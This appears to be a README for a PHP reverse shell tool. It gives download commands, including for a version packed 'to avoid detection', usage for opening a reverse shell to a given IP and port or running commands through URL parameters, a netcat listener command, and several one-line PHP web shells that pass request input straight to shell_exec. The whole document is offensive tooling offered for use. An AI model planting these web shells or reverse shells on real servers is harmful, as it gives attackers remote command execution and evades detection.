PHP Smart Reverse Shell scripts

A smarter shell script

Get script

Grap the latest release

wget -O srs.php https://github.com/GramThanos/php-smart-reverse-shell/releases/download/v2.0-smart/srs.php

Get the packed version to avoid detection (packed using Split&Encrypt)

wget -O srs.php https://github.com/GramThanos/php-smart-reverse-shell/releases/download/v2.0-smart/srs.packed.php

Script Commands

• Call reverse shell from console php ./srs.php 127.0.0.1 1234
• Call reverse shell from url https://example.com/srs.php?ip=127.0.0.1&port=1234
• Run command from url https://example.com/srs.php?c=ls%20-la
• Run command from url https://example.com/srs.php?r=ls%20-la(redirect errors to stdout)

Other commands

Sockets

Wait for a reverse shell connection

nc -l 127.0.0.1 4444

PHP

Executing shell code with PHP

<?php echo shell_exec($_GET['command']);?>

or

<?=isset($_GET['c'])?shell_exec($_GET['c']):'';?>

or

<?php if(isset($_GET['c'])){header('Content-Type: text/plain');die(shell_exec($_REQUEST['c'].'2>&1'));}?>

Download Smart Reverse Shell and open shell connection

wget -O srs.php https://raw.githubusercontent.com/GramThanos/php-smart-reverse-shell/master/srs.php
php ./srs.php 127.0.0.1 1234